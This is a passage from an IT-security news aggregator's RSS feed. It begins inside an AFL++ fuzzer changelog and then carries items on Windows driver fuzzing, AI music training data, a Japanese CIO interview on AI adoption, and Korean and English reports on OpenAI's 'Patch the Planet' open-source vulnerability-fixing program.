based on the paper <a href="https://mlsec.org/docs/2026-icse.pdf" rel="nofollow">https://mlsec.org/docs/2026-icse.pdf</a></li>
<li>if <code>-fsanitize-coverage-allowlist=</code>/<code>-fsanitize-coverage-ignorelist=</code> is<br>
passed without <code>AFL_LLVM_ALLOWLIST</code>/<code>AFL_LLVM_DENYLIST</code> being set, the<br>
supplied list is reused as <code>AFL_LLVM_ALLOWLIST</code>/<code>AFL_LLVM_DENYLIST</code> (with<br>
a warning) so the optimized PCGUARD honors it</li>
<li>instrument allow/deny lists (<code>AFL_LLVM_ALLOWLIST</code>/<code>AFL_LLVM_DENYLIST</code> and<br>
the GCC equivalents): function (<code>fun:</code>) entries are now matched verbatim<br>
with <code>fnmatch()</code> instead of having a <code>*</code> prepended automatically - add a<br>
leading <code>*</code> yourself for a suffix match. Function entries are matched<br>
against both the mangled and the demangled (LLVM) / unqualified (GCC)<br>
name, and an explicit <code>fun:</code> prefix now permits <code>:</code> so demangled C++/Rust<br>
names can be listed. File (<code>src:</code>) entries are unchanged and still match<br>
as a suffix (an implicit leading <code>*</code>)</li>
<li>AFL_LLVM_CRASHLIST - crash on any function that is marked not to be<br>
instrumented but is entered by fuzzing input</li>
<li>bugfix for __AFL_LOOP() that lingered since vanilla afl, first run<br>
coverage map would look different to following runs, impacting lots of<br>
functionality (minimizing, stability, etc.)</li>
</ul>
</li>
<li>afl-* script tools:
<ul>
<li>prefer AFL_PATH to find afl-showmap</li>
</ul>
</li>
<li>man pages: fixed the SYNOPSIS and OPTIONS sections for several tools</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[WinPE as a stateless harness for Windows driver testing and fuzzing]]></title>
<description><![CDATA[submitted by    /u/Acanthisitta-Sea   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3631508/reverse-engineering/winpe-as-a-stateless-harness-for-windows-driver-testing-and-fuzzing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631508/reverse-engineering/winpe-as-a-stateless-harness-for-windows-driver-testing-and-fuzzing/</guid>
<pubDate>Sun, 28 Jun 2026 22:07:59 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Acanthisitta-Sea"> /u/Acanthisitta-Sea </a> <br> <span><a href="https://bednars.me/blog/winpe-harness">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1ui649b/winpe_as_a_stateless_harness_for_windows_driver/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Australian musicians sound warning note after Nick Cave, Kylie and many more slurped into AI training tool]]></title>
<description><![CDATA[‘It’s all just rendered useless’ Something For Kate’s Paul Dempsey says as AI scrapes millions of songs to learn how to make musicPaul Dempsey and Bernard Fanning are among big-name Australian musicians upset that their original songs have been found in datasets used to train artificial intellige...]]></description>
<link>https://tsecurity.de/de/3626119/ai-nachrichten/australian-musicians-sound-warning-note-after-nick-cave-kylie-and-many-more-slurped-into-ai-training-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626119/ai-nachrichten/australian-musicians-sound-warning-note-after-nick-cave-kylie-and-many-more-slurped-into-ai-training-tool/</guid>
<pubDate>Fri, 26 Jun 2026 03:17:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>‘It’s all just rendered useless’ Something For Kate’s Paul Dempsey says as AI scrapes millions of songs to learn how to make music</p><p>Paul Dempsey and Bernard Fanning are among big-name Australian musicians upset that their original songs have been found in datasets used to train artificial intelligence.</p><p>A dataset search tool recently <a href="https://www.theatlantic.com/technology/2026/06/ai-music-generators-suno-google-udio/687485/">created by US publication The Atlantic</a> reveals millions of creative works have been scraped from the internet to train the disruptive technology.</p> <a href="https://www.theguardian.com/culture/2026/jun/26/australian-musicians-aussie-music-ai-training-tool-nick-cave-kylie-minogue-paul-dempsey">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI導入の最前線——3人のCIOが語る戦略的優先事項]]></title>
<description><![CDATA[保険ブローカーTrucordiaのCIO、Rajeev Khanna氏の戦略的優先事項は、多くのCIOと同様、組織全体へのAI導入が最上位にある。サイバーセキュリティ、データ・分析プロジェクト、イノベーションも並行して進めている。どれも特別なものではないが、Khanna氏は汎用的なテンプレートや曖昧な目標では進められないと理解している。自動化とAIでワークフローを効率化し、テクノロジーで顧客の特定のニーズに応え、新しい製品・サービスで市場での差別化と成長を実現する。



「テクノロジーがビジネスのイノベーションと提供スピードを実現している」とKhanna氏は言う。CIO.comのSta...]]></description>
<link>https://tsecurity.de/de/3626020/it-security-nachrichten/ai-3cio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626020/it-security-nachrichten/ai-3cio/</guid>
<pubDate>Fri, 26 Jun 2026 01:05:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>保険ブローカーTrucordiaのCIO、Rajeev Khanna氏の戦略的優先事項は、多くのCIOと同様、組織全体へのAI導入が最上位にある。サイバーセキュリティ、データ・分析プロジェクト、イノベーションも並行して進めている。どれも特別なものではないが、Khanna氏は汎用的なテンプレートや曖昧な目標では進められないと理解している。自動化とAIでワークフローを効率化し、テクノロジーで顧客の特定のニーズに応え、新しい製品・サービスで市場での差別化と成長を実現する。</p>



<p>「テクノロジーがビジネスのイノベーションと提供スピードを実現している」とKhanna氏は言う。<br>CIO.comのState of the CIO調査によれば、CIOが挙げる最も戦略的に重要な技術施策は、「生成AI」が最上位、続いて「エージェンティックAI」「データ・ビジネス分析」「セキュリティ・リスク管理」「IT・ビジネスプロセスの自動化」が上位5つを占めている。「モダナイゼーション」「クラウド管理」「クラウドへのアプリケーション開発・移行」といった従来型のITタスクは、それより下位に位置する。</p>



<p>CIOやアドバイザー、アナリストは、この施策リストがテック幹部の関心の変化を映していると指摘する。技術的な卓越性そのものを主目的とするのではなく、組織の戦略とビジネス成果を形作り、実現することにより多くのエネルギーを注いでいるのだ。「CIOは、AI導入とビジネス価値をエンタープライズ規模で推進するために必要なITアーキテクチャ、組織構造、プロセス変革の先頭に立っている」と調査は指摘する。</p>



<p>こうした変化は、CIOの役割が「業務の指示を受けて動く存在」から「変革のリーダー」へと進化していることを示している。CIOは事業部門のリーダーと積極的に連携し、AI導入を推進し、すべての技術施策から高い価値の成果を引き出すことに注力している。実際、2026年のCIOは事業リーダーとの協働、新興技術の学習、AI施策を支える組織構造の構築に多くの時間を割くようになった。その反面で、ベンダーとの交渉、ITの危機対応、コスト管理に費やす時間は前年より減っている。</p>



<h2 class="wp-block-heading">テクノロジーが新しいケイパビリティと製品を生む</h2>



<p>Khanna氏は「組織にとって差別化につながる新しいケイパビリティを生み出し、クライアント向けの新製品をより効率的かつ速いペースで立ち上げること」を優先している。そこでは、多くの場合AIを使っているという。データと分析を活用するプロジェクトも優先しており、たとえば分析ツールにLLMを組み込み、ユーザーが自然言語でデータに問いかけられるようにしている。</p>



<p>そこで「常に最優先」とKhanna氏がいうのが「サイバーセキュリティ」だは言う。「サイバーは常に動く標的だ。最新の状態を保ち、現代化し、攻撃者の手口の先を行く必要がある。それは永遠に続く取り組みだ」。</p>



<h2 class="wp-block-heading">AIのスケーリングが目標になる</h2>



<p>MetLifeのグローバルCIO、Nick Nadgauda氏も同様にITの戦略的施策をビジネスの推進力として語る。「最も戦略的に重要な施策は、散発的な実験にとどまっていたAIを、企業の運営に組み込まれた中核的で信頼できるケイパビリティへとスケールさせることだ。MetLifeではAIを単独の技術プロジェクトではなく、戦略の重要な実現手段として捉えている。意思決定を磨き、業務を簡素化し、最終的に顧客とビジネスにより良い成果をもたらす」。</p>



<p>MetLifeは社内向けのAI統合プラットフォーム「MetIQ」を展開し、「セキュアでガバナンスされた環境でチームがAIソリューションを実験・構築・展開できる」ようにしているとNadgauda氏は説明する。「データ、プライバシー、リスクに関する強固な管理を維持しながら、急速に進化するテクノロジーに適応できる柔軟性を提供している」と言う。</p>



<p>MetLifeのIT部門は、AIを社員のツールやプロセスに統合し、「事後ではなく、意思決定の早い段階から支援する思考のパートナー」にしている。AIの体験、ツール、トレーニングは「人々の実際の働き方に合わせて意図的に設計」されており、社員が自分の日常業務にAIの関連性を感じることで「意味のある導入」が実現している。その結果、AIは「エンジニアリング、オペレーション、顧客対応チームにおける仕事の進め方の自然な一部」になったとNadgauda氏は言う。</p>



<p>「テクノロジーとビジネスが完全に絡み合う世界で、企業の運営方法そのものを形作ることだ。ビジネスがより速く動き、より良い意思決定を下し、顧客により強い成果を届けられるようにすることを常に考える必要がある」（Nadgauda氏）。</p>



<h2 class="wp-block-heading">エージェンティックAIが優先事項になる</h2>



<p>Tata Consultancy ServicesのCIO、Janardhan Santhanam氏も、ビジネスの変革をITの戦略的な使命と捉え、その推進力としてエージェンティックAIを位置づける。State of the CIO調査では、回答者の38%がエージェンティックAIを戦略的に重要な技術施策として挙げている。</p>



<p>「最も重要な施策は、エージェンティックな企業として仕事の進め方そのものを再定義すること」とSanthanam氏は言う。目標は「組織の成長に欠かせない、持続的で非線形なパフォーマンス向上」を実現することだ。</p>



<p>「社員の間にAIファーストの文化を作り、社内の機能とITのオペレーティングモデルを『エージェント＋アプリ＋人間』が協働してインテリジェントな意思決定と自律的な実行を行う形にリセットすることだ。AIインフラを全員の手に届けるだけでなく、権限も分散させ、2倍の力を持つワーカーとチームを生み出している」とSanthanam氏は説明する。さらにIT部門は各事業部門のプロセスを再構築し、Santhanam氏はこれを「ファンクション・アズ・ア・プラットフォーム」と表現する。同調査が挙げる別の重要施策と同様、TCSもAI推進の中でセキュリティ、プライバシー、コンプライアンスを優先している。</p>



<p>エージェンティックAIへの期待は高い。2026年4月のHFS ResearchとGenpactの調査では、92%の経営幹部がエージェンティックAIが仕事の進め方を根本的に変えると考えている。FTI Consultingのシニアマネージングディレクター、Oz Vural氏は「ITはガードレールの中でワークフローを実行しリアルタイムで判断できるエージェンティックAIへ移行する必要がある」と言う。これは単に時間を節約するだけでなく、CIOが収益とEBITAの向上に貢献できる機会だ。CIOの成功指標も、いかに速く「インテリジェンスへの到達時間」を短縮できるかへと変わりつつある。</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[오픈AI, 오픈소스 보안 강화 나선다…‘패치 더 플래닛’ 프로젝트 출범]]></title>
<description><![CDATA[오픈AI가 사이버보안 기업 트레일 오브 비츠(Trail of Bits)와 협력해 널리 사용되는 오픈소스 소프트웨어의 취약점을 찾아 수정하는 AI 기반 프로그램을 출범했다. 소프트웨어 공급망 깊숙이 존재하는 결함으로 인해 기업이 직면하는 보안 위험이 커지는 상황에 대응하기 위한 조치다.



‘패치 더 플래닛(Patch the Planet)’으로 명명된 이 프로젝트는 AI 기반 취약점 연구와 인간 전문가의 검토를 결합해 보안 문제를 식별하고, 이를 검증된 패치로 발전시켜 기존 프로젝트의 공개 절차를 통해 배포할 수 있도록 지원한...]]></description>
<link>https://tsecurity.de/de/3620552/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620552/it-nachrichten/ai/</guid>
<pubDate>Wed, 24 Jun 2026 09:47:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>오픈AI가 사이버보안 기업 트레일 오브 비츠(Trail of Bits)와 협력해 널리 사용되는 오픈소스 소프트웨어의 취약점을 찾아 수정하는 AI 기반 프로그램을 출범했다. 소프트웨어 공급망 깊숙이 존재하는 결함으로 인해 기업이 직면하는 보안 위험이 커지는 상황에 대응하기 위한 조치다.</p>



<p>‘<a href="https://openai.com/index/patch-the-planet/" target="_blank" rel="nofollow">패치 더 플래닛</a>(Patch the Planet)’으로 명명된 이 프로젝트는 AI 기반 취약점 연구와 인간 전문가의 검토를 결합해 보안 문제를 식별하고, 이를 검증된 패치로 발전시켜 기존 프로젝트의 공개 절차를 통해 배포할 수 있도록 지원한다.</p>



<p>초기 참여 프로젝트에는 파이썬(Python), 고(Go), cURL, 시그스토어(Sigstore), NATS 서버(NATS Server), aiohttp, 프리엔진엑스(freenginx), pyca/cryptography, python.org 등이 포함됐다. 이들 프로젝트는 소프트웨어 개발, 네트워킹, 암호화, 소프트웨어 공급망 인프라 등 다양한 영역에서 활용되며 광범위한 기업용 애플리케이션과 서비스의 기반을 제공하고 있다.</p>



<p>오픈AI는 각 프로젝트가 유지관리자와의 협의를 통해 보안 지원이 가장 필요한 영역을 파악하는 단계부터 시작된다고 설명했다. 이후 연구진이 잠재적인 취약점을 조사하고, 실제 영향을 미치는 문제를 검증한 뒤 패치를 개발하거나 개선한다. 또한 테스트를 지원하고 기존 프로젝트의 공개 절차에 맞춰 취약점 공개를 조율할 예정이다.</p>



<p>참여 보안 연구원은 오픈AI의 AI 모델과 코덱스 시큐리티(Codex Security)를 활용해 코드를 분석하고 수정 작업이 배포 단계까지 이어질 수 있도록 지원한다. 트레일 오브 비츠 엔지니어는 결과가 유지관리자에게 전달되기 전에 이를 검토한다. 이는 오탐지와 중복 보고를 걸러내 오픈소스 프로젝트의 추가 업무 부담을 줄이기 위한 절차다.</p>



<p>오픈AI는 프로그램 확대에 맞춰 해커원(HackerOne), 캘리프(Calif)와도 협력하고 있다. 이들 기관은 취약점 분류, 책임 있는 공개 절차, 추가적인 취약점 발굴 작업을 지원한다.</p>



<p>오픈AI는 현재까지 프로젝트를 통해 “수백 건의 보안 문제를 발견하고 수십 건의 패치를 병합했으며, 더 많은 사례가 현재 조정된 공개 절차에 따라 처리되고 있다”라고 밝혔다.</p>



<p>또한 이번 프로젝트를 통해 퍼징(fuzzing), 과거 CVE 분석, 차등 테스트(differential testing)를 위한 도구가 개발됐으며, 패치 생성 이전에 부정확한 결과를 걸러내는 시스템도 구축됐다고 설명했다.</p>



<p>오픈AI가 오픈소스 보안에 집중하게 된 배경에는 로그4셸(Log4Shell)과 XZ 유틸리티(XZ Utils) 백도어 사건이 있다. 이들 사례는 공유 소프트웨어 구성요소의 결함이 얼마나 빠르게 기업용 소프트웨어 전반으로 확산될 수 있는지를 보여줬다.</p>



<p>업계 분석가들은 패치 더 플래닛이 기업의 위험 관리 방식에 변화를 가져올 수는 있지만, AI 기반 취약점 연구를 보다 광범위한 소프트웨어 공급망 위험 관리 프로그램의 일부로 활용할 때에만 의미가 있다고 평가했다. AI를 기존 보안 체계를 대체하는 수단으로 여겨서는 안 된다는 것이다.</p>



<p>포레스터의 수석 애널리스트 <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="nofollow">비스와지트 마하파트라</a>(Biswajeet Mahapatra)는 “가장 큰 변화는 속도”라며 “AI 지원 연구는 취약점 탐지와 검증, 패치 개발, 테스트, 문서화 과정을 더욱 빠르게 수행할 수 있으며, 인간 검토자는 유지관리자에게 전달되기 전에 오탐지를 줄일 수 있다”라고 설명했다.</p>



<p>이어 “하지만 부족한 전문 인력에 대한 의존성이 사라지는 것은 아니다”라며 “그 역할이 취약점 분류, 악용 가능성 판단, 패치 안전성 검토, 공개 시점 결정, 운영 환경 배포 관리 등으로 이동할 뿐”이라고 분석했다.</p>



<h2 class="wp-block-heading">운영 환경 적용 전 거버넌스 체계 마련 필요</h2>



<p>오픈소스 사이버보안 아키텍트 <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="nofollow">데바슈리 다타</a>(Devashri Datta)는 기업이 AI 기반 취약점 연구를 보안 운영 파이프라인에 도입하기 전에 적절한 거버넌스 통제를 구축해야 한다고 조언했다. 검증되지 않은 결과가 엔지니어링 조직에 과도한 부담을 주는 상황을 방지하기 위해서다.</p>



<p>다타는 “CISO는 위험 모델링 과정에서 ‘안전성 관련 계층(Safety Relevance Layer)’을 요구해야 한다”라며 “이는 AI가 생성한 모든 결과가 인간 분석가에게 전달되기 전에 자동 검증 절차를 통과하도록 하는 구조화된 프레임워크로, 동적 개념증명(PoC) 검증과 강력한 오탐지 필터링 기능을 포함해야 한다”라고 설명했다.</p>



<p>다타는 이러한 통제 체계가 취약점 공개 절차까지 포괄해야 한다고 지적했다. 특히 AI 도구가 기업이 직접 관리하지 않는 제3자 오픈소스 구성요소에서 결함을 발견한 경우가 중요하다는 설명이다. 조직은 외부 의존성에서 확인된 문제가 발견될 때 즉시 적용할 수 있는 에스컬레이션 경로, 통지 일정, 역할 분담 체계를 사전에 마련해야 한다고 강조했다.</p>



<p>다타는 “AI로 가속화된 환경에서 임기응변식 취약점 공개는 단순한 절차상의 공백이 아니라 기업의 책임 문제로 이어질 수 있다”라며 “운영 파이프라인에서 AI를 신뢰하려면 검증 가능한 감사 체계가 필수적이다. 조직은 AI가 특정 코드 줄을 문제로 판단한 이유와 취약점 악용 가능성을 어떻게 검증했는지, 그리고 패치가 하위 운영 시스템에 문제를 일으키지 않는다고 판단한 근거를 추적할 수 있어야 한다”라고 말했다.</p>



<h2 class="wp-block-heading">정기 대응에서 지속 대응으로</h2>



<p>업계 분석가들은 AI 기반 취약점 연구가 기업의 보안 운영 방식을 정기적인 패치 주기 중심에서 지속적인 위험 평가 체계로 전환하도록 만들 수 있다고 전망했다. 변형 분석(variant analysis)과 차등 테스트(differential testing)에 필요한 시간이 수주에서 수일 수준으로 단축될 경우, 보안팀은 자사 환경에서 실제로 중요한 취약점을 더 빠르게 선별해야 하기 때문이다.</p>



<p>다타는 이러한 변화가 기업의 취약점 우선순위 결정 방식에도 영향을 줄 것이라고 분석했다. 앞으로는 일반적인 CVSS(Common Vulnerability Scoring System) 점수만으로 대응 우선순위를 정하기 어려워질 것이며, 취약점은 영향을 받는 시스템과 비즈니스 역할, 운영 환경 노출 수준, 실제 악용 가능성 등을 종합적으로 고려해 평가해야 한다는 설명이다.</p>



<p>다타는 “이제는 맥락을 반영한 안전 중심의 우선순위 결정 체계로 전환해야 한다”라며 “기업의 SBOM과 VEX(Vulnerability Exploitability eXchange, 취약점 악용 가능성 교환) 프로그램은 단순한 규정 준수용 스프레드시트에서 벗어나 실시간 기계 판독형 데이터 체계로 발전해야 한다”라고 말했다.</p>



<p>이어 “특히 AI 기반 파이프라인에서는 VEX 모델을 확장해 AI가 새롭게 만들어내는 위험 영역까지 포함해야 한다”라고 설명했다.</p>



<p>포레스터의 마하파트라는 취약점 관리 프로그램 역시 소프트웨어 소유권, 공급업체 대응, 비즈니스 영향 분석과 더욱 긴밀하게 연결돼야 한다고 평가했다.</p>



<p>마하파트라는 “보안팀은 정기적인 취약점 처리 방식에서 벗어나 지속적인 노출 감소 체계로 전환해야 한다”라고 말했다.</p>



<p>이는 SBOM을 단순한 규정 준수 문서가 아닌, 운영 환경 노출도와 공급업체 대응 현황이 반영된 살아 있는 자산 목록으로 관리해야 함을 의미한다. 또한 패치 적용 여부를 결정할 때는 자산 중요도, 실제 악용 가능성, 보완 통제 수단, 비즈니스 영향 등을 함께 고려해야 한다고 그는 설명했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Will California’s billionaire tax proposal make it to ballots?]]></title>
<description><![CDATA[Despite more than double the needed number of signatures to qualify for ballot, there’s uncertainty it’ll make it to votersHi and welcome to TechScape. Nick Robins-Early and Dara Kerr here, filling in for your usual host Blake Montgomery who is out on vacation. We’ll be talking about the fight ov...]]></description>
<link>https://tsecurity.de/de/3618439/it-nachrichten/will-californias-billionaire-tax-proposal-make-it-to-ballots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618439/it-nachrichten/will-californias-billionaire-tax-proposal-make-it-to-ballots/</guid>
<pubDate>Tue, 23 Jun 2026 15:33:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Despite more than double the needed number of signatures to qualify for ballot, there’s uncertainty it’ll make it to voters</p><p>Hi and welcome to TechScape. Nick Robins-Early and Dara Kerr here, filling in for your usual host Blake Montgomery who is out on vacation. We’ll be talking about the fight over a proposed billionaire tax in California, the UK’s social media ban and SpaceX making a big buy in the AI arms race.</p><p><a href="https://www.theguardian.com/us-news/2026/jun/18/california-billionaire-tax-ballot-tech-opposition">California ‘billionaire tax’ makes ballot despite opposition from tech moguls</a></p><p><a href="https://www.theguardian.com/us-news/2026/jun/01/tech-billionaires-california-elections">Tech billionaires are spending unprecedented sums in California races. Experts say it’s the tip of the iceberg</a></p><p><a href="https://www.theguardian.com/media/2026/jun/17/it-makes-no-sense-16--and-17-year-olds-on-social-media-ban">‘It makes no sense’: 16- and 17-year-olds on UK social media ban</a></p><p><a href="https://www.theguardian.com/media/2026/jun/15/uk-ministers-lobby-trump-backlash-social-media-ban">UK ministers lobby Trump to avert backlash against social media ban</a></p> <a href="https://www.theguardian.com/technology/2026/jun/22/california-billionaire-tax-techscape">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI rolls out AI-led push to fix open-source software flaws]]></title>
<description><![CDATA[OpenAI has launched a program with cybersecurity firm Trail of Bits to use AI to find and fix vulnerabilities in widely used open-source software, as enterprises face growing risks from flaws buried deep in their software supply chains.



The initiative, called Patch the Planet, uses AI-assisted...]]></description>
<link>https://tsecurity.de/de/3618027/ai-nachrichten/openai-rolls-out-ai-led-push-to-fix-open-source-software-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618027/ai-nachrichten/openai-rolls-out-ai-led-push-to-fix-open-source-software-flaws/</guid>
<pubDate>Tue, 23 Jun 2026 13:03:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>OpenAI has launched a program with cybersecurity firm Trail of Bits to use AI to find and fix vulnerabilities in widely used open-source software, as enterprises face growing risks from flaws buried deep in their software supply chains.</p>



<p>The initiative, called <a href="https://openai.com/index/patch-the-planet/" target="_blank" rel="noreferrer noopener">Patch the Planet</a>, uses AI-assisted vulnerability research alongside human review to help turn security findings into tested fixes that can be disclosed through existing project channels.</p>



<p>Initial participants include Python, Go, cURL, Sigstore, NATS Server, aiohttp, freenginx, pyca/cryptography, and python.org. These projects support software development, networking, cryptography, and <a href="https://www.csoonline.com/article/4170694/cisas-ai-sbom-guidance-pushes-software-supply-chain-oversight-into-new-territory.html">supply chain</a> infrastructure used across a wide range of enterprise applications and services.</p>



<p>OpenAI said each engagement will begin with consultation with maintainers to identify where security support is most needed. Researchers will then investigate potential vulnerabilities, validate meaningful issues, develop or refine patches, support testing, and coordinate disclosure through the project’s existing channels.</p>



<p>Participating security researchers will use the company’s models and Codex Security to analyze code and help move fixes toward release. Trail of Bits engineers will review findings before they are sent to maintainers, a step meant to filter out false positives and duplicate reports before they add to the workload of open-source projects.</p>



<p>The company is also working with HackerOne and Calif to support vulnerability triage, coordinated disclosure, and additional discovery work as the program expands.</p>



<p>OpenAI said work under the program has already identified “hundreds of security issues and merged dozens of patches, with many more still undergoing coordinated disclosure.”</p>



<p>The work has also produced tools for fuzzing, historical CVE analysis, and differential testing, along with systems to filter inaccurate findings before patches are generated, OpenAI added.</p>



<p>The focus on open-source security follows incidents such as <a href="https://www.csoonline.com/article/1259949/lazarus-apt-attack-campaign-shows-log4shell-exploitation-remains-popular.html">Log4Shell</a> and the <a href="https://www.csoonline.com/article/2077692/dangerous-xz-utils-backdoor-was-the-result-of-years-long-supply-chain-compromise-effort.html">XZ Utils backdoor</a>, which showed how quickly a flaw in a shared component can move through enterprise software.</p>



<p>Analysts said Patch the Planet changes the risk equation only if enterprises treat AI-assisted vulnerability research as an input to a broader software supply chain risk program, not as a substitute for one.</p>



<p>“The key shift is speed: AI-assisted research can help find, validate, patch, test, and document issues faster, while human reviewers reduce false positives before maintainers are burdened,” said <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, principal analyst at Forrester. “But the dependency on scarce expertise does not go away; it moves to triage, exploitability judgment, patch safety, disclosure timing, and production rollout.”</p>



<h2 class="wp-block-heading">Guardrails before deployment</h2>



<p>CISOs should put governance controls in place before using AI-assisted vulnerability research in enterprise security pipelines, to ensure unverified findings do not overwhelm engineering teams, said <a href="https://www.linkedin.com/in/devashri-datta-522b364b/" target="_blank" rel="noreferrer noopener">Devashri Datta</a>, an open-source cybersecurity architect.</p>



<p>“CISOs should demand a Safety Relevance Layer in their risk modeling, a structured framework that requires every AI-generated finding to pass automated verification, including dynamic proof-of-concept validation and strong false-positive filtering, before it reaches a human analyst,” Datta said.</p>



<p>Those controls should also cover disclosure, particularly when AI tools identify flaws in third-party open-source components that the enterprise does not control, Datta said. Organizations need predefined escalation paths, notification timelines, and role assignments that take effect once a confirmed issue is found in an external dependency.</p>



<p>“Ad hoc disclosure in an AI-accelerated environment isn’t just a process gap; it’s a liability,” Datta said. “Trusting AI in the production pipeline requires verifiable auditability: organizations must be able to trace why the AI flagged a line of code, how it validated the exploit, and how it determined that the patch would not break downstream production systems.”</p>



<h2 class="wp-block-heading">Continuous exposure reduction</h2>



<p>AI-assisted vulnerability research could force enterprises to move away from periodic patching cycles and toward more continuous risk assessment, analysts said. If variant analysis and differential testing can be compressed from weeks to days, security teams may need faster ways to decide which findings matter most in their own environments.</p>



<p>That shift also means enterprises can no longer rely only on generic CVSS scores to prioritize remediation, Datta said. Findings will need to be assessed against the affected system, its business role, runtime exposure and the likelihood that a flaw can be exploited.</p>



<p>“We have to move toward context-aware, safety-critical prioritization,” Datta said. “Enterprise SBOM and VEX programs must evolve from passive compliance spreadsheets into live, machine-readable data feeds. For AI-assisted pipelines specifically, that means extending the VEX model to cover AI-introduced risk surfaces.”</p>



<p>Mahapatra said vulnerability management programs will also need to become more closely tied to software ownership, supplier response, and business impact.</p>



<p>“Security teams should move from periodic vulnerability handling to continuous exposure reduction,” Mahapatra said.</p>



<p>That means SBOMs should be treated as live inventories tied to runtime exposure and supplier response, rather than static compliance documents. Patch decisions should also account for asset criticality, exploitability, compensating controls, and business impact.</p>



<p><em>The article originally appeared on <a href="https://www.csoonline.com/article/4188321/openai-rolls-out-ai-led-push-to-fix-open-source-software-flaws.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI rolls out AI-led push to fix open-source software flaws]]></title>
<description><![CDATA[OpenAI has launched a program with cybersecurity firm Trail of Bits to use AI to find and fix vulnerabilities in widely used open-source software, as enterprises face growing risks from flaws buried deep in their software supply chains.



The initiative, called Patch the Planet, uses AI-assisted...]]></description>
<link>https://tsecurity.de/de/3617945/it-security-nachrichten/openai-rolls-out-ai-led-push-to-fix-open-source-software-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617945/it-security-nachrichten/openai-rolls-out-ai-led-push-to-fix-open-source-software-flaws/</guid>
<pubDate>Tue, 23 Jun 2026 12:37:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>OpenAI has launched a program with cybersecurity firm Trail of Bits to use AI to find and fix vulnerabilities in widely used open-source software, as enterprises face growing risks from flaws buried deep in their software supply chains.</p>



<p>The initiative, called <a href="https://openai.com/index/patch-the-planet/" target="_blank" rel="noreferrer noopener">Patch the Planet</a>, uses AI-assisted vulnerability research alongside human review to help turn security findings into tested fixes that can be disclosed through existing project channels.</p>



<p>Initial participants include Python, Go, cURL, Sigstore, NATS Server, aiohttp, freenginx, pyca/cryptography, and python.org. These projects support software development, networking, cryptography, and <a href="https://www.csoonline.com/article/4170694/cisas-ai-sbom-guidance-pushes-software-supply-chain-oversight-into-new-territory.html">supply chain</a> infrastructure used across a wide range of enterprise applications and services.</p>



<p>OpenAI said each engagement will begin with consultation with maintainers to identify where security support is most needed. Researchers will then investigate potential vulnerabilities, validate meaningful issues, develop or refine patches, support testing, and coordinate disclosure through the project’s existing channels.</p>



<p>Participating security researchers will use the company’s models and Codex Security to analyze code and help move fixes toward release. Trail of Bits engineers will review findings before they are sent to maintainers, a step meant to filter out false positives and duplicate reports before they add to the workload of open-source projects.</p>



<p>The company is also working with HackerOne and Calif to support vulnerability triage, coordinated disclosure, and additional discovery work as the program expands.</p>



<p>OpenAI said work under the program has already identified “hundreds of security issues and merged dozens of patches, with many more still undergoing coordinated disclosure.”</p>



<p>The work has also produced tools for fuzzing, historical CVE analysis, and differential testing, along with systems to filter inaccurate findings before patches are generated, OpenAI added.</p>



